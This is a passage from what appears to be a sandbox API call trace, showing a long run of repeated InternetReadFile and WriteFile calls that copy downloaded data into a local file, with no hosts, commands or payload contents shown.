lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.643] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.643] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.644] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.644] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.644] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.644] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.644] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.644] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.645] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.646] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.647] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.648] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.656] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.656] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.657] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.657] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.658] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.658] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.659] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.659] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.660] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.661] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.662] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.662] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.662] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.662] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.662] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.662] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.663] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.663] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.664] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.664] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.664] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.664] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.664] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.664] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.665] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.665] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.665] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.665] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.665] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.666] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.666] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.666] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.666] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.666] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.666] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.666] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.667] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.667] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.667] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.667] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.667] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.667] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.667] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.668] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.668] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.668] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.668] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.668] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.668] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.669] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.669] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.669] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.669] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.669] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.669] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.669] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.669] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.670] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.670] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.670] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.670] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.670] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.670] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.670] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.671] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.671] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.671] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.671] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.672] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.672] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.672] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.672] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.673] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.673] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.673] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.673] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.673] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.673] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.673] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.674] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.674] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.674] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.674] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.674] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.675] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.675] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.675] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.675] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.675] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.676] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.676] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.676] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.676] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.676] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.676] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.677] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, 